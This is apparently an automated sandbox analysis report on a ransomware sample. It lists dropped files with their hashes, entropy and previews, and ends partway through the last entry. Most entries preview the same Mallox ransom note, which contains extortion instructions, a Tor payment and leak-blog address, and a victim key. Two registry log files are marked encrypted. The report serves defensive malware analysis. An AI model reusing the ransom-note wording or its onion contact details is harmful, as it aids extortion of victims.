                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\Default\Downloads\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\Default\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\Default\Favorites\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\Default\Links\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\Default\NTUSER.DAT.LOG1

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):65644
                        Entropy (8bit):7.99715566201769
                        Encrypted:true
                        SSDEEP:1536:k1X7FjGhAV7qZk2JbRGZZQMi/SNhcN7MPLcMKAInFFfM+VH/g5:EXBjLV+fJbRGZZnyFN7MPLc7Rnk+VHY5
                        MD5:2806F4A51A0608F888CEF835F297D920
                        SHA1:48E7CC1ABD21E4D9D9813AE20A05A213DB8FC7EA
                        SHA-256:A5580513C37196B15276B6F6F3BEBD451F6237E363317950BF04069329B03EB9
                        SHA-512:BED2823834C1B41AE3A1C63168B80DEDF0A9982BEB6D60F00BB76E0444F84B1EC386EB3C503B19E791C2089FF4AA516176FED392F4C97602F15E31CECE272FD1
                        Malicious:true
                        Preview:.\py.;<j..... .n*0=..9.l.^s/..v.....m.:,R....P.\V}...$.n..+..u^<.L[.$a#q|.......j..t..er...HK@Z....!...:V.......t..h...be_..jc~...&.....2.KnD`...n.d.$~.X..cB..$hRA^t.k...m.g.}"...jbJ..I..v...U..I8...Y.>. . :r.xy.~>f."..*.........k...[d..*x.....S0....[kR.56.l.......;o.....I.q...0`.o3..Y....'..!jr/...5.+8....{...s.U.....X3...5b.WY.....~....(nr...4.."HU.$........sk..+[:..t.&K..........SH..y.).....\..#E.l....."+.68W.7tx.....?o.......O...w.....V ...F....mX....d.N!O...O=....WL.8<.k..@.5Z.iAd...A..,.i.n........k...O.W.m.......RZ..3!R.......)w.q3.|E......b.[.=|x..Y&.h..a..|...........j.<CWL.............@.m....I+..l.GB..OF:J..n.={.....rY...>........Rw...W..... ..A...B..e.-....&..T.f.=....\a/...E!.w.....2...h.[......W...7..5..ht.......&....r.M O.6.........H...."..a...nmbi......;.:......."......|&.1K....d..+...1-Y.3.H....W......_...qo..p....B..3......@....1$.,.."]..8U1..lZ... '.......sF."e..@.jk..B.O-...|b...o.}.4D........N.|.'......

                        C:\Users\Default\NTUSER.DAT.LOG2

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):20588
                        Entropy (8bit):7.990581937810614
                        Encrypted:true
                        SSDEEP:384:ld8+JCV1ioOiVCZe99JzPYUZQJic7C1f5pTsCe7p+QkIPL+XxVy11rWaDoBgrcxC:pg0GVCZe99ZZQd+1hpIb+QBahU11X4xC
                        MD5:D8FF4556628CFEED59ADDF67EF2C25F2
                        SHA1:6126ADCC05462990AFCDDFF102E3D99B31399F8B
                        SHA-256:23BDE50CC64A27343CC20D3FB6A7FEB6CC4753F8931F20072326D371E3EE0781
                        SHA-512:836D1BEF8A9864991D98687E02E7AA04C11389EFA20D1B7E58230E3DAA4BA58FD450DB13CBC08ECB2B609503A5BFB1D37F31EC79948BBF5A7C69A0613808E275
